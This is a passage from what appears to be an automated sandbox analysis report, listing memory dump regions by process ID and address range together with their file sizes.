                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/4544-324-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/4544-319-0x0000000003940000-0x000000000397C000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                240KB

                                                                                                                                                                                                                                                                                              • memory/4544-339-0x0000000005080000-0x0000000005081000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/4544-347-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/4544-329-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/4544-331-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/4544-336-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/4544-334-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/4544-333-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/4544-335-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/4572-362-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/4792-266-0x00000000023E0000-0x00000000023E2000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                                              • memory/4792-263-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/4800-365-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/4936-269-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/4936-280-0x0000000000EC0000-0x0000000000EC2000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                8KB

                                                                                                                                                                                                                                                                                              • memory/4992-274-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/4992-277-0x0000000000E10000-0x0000000000E1D000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                52KB

                                                                                                                                                                                                                                                                                              • memory/5064-318-0x00000000001F0000-0x00000000001F1000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/5064-306-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5076-312-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5184-315-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5288-330-0x00000000008F0000-0x00000000008F1000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/5288-323-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5308-328-0x0000000000400000-0x000000000044C000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                304KB

                                                                                                                                                                                                                                                                                              • memory/5308-325-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5356-369-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5368-341-0x0000000007900000-0x0000000007901000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/5368-337-0x0000000000610000-0x0000000000611000-memory.dmp
                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                              • memory/5368-332-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5444-342-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5472-345-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5484-355-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5536-350-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5552-351-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5720-366-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5740-356-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5776-363-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5948-353-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/5956-352-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/6028-357-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/6064-358-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/6072-359-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/6100-360-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                              • memory/6124-361-0x0000000000000000-mapping.dmp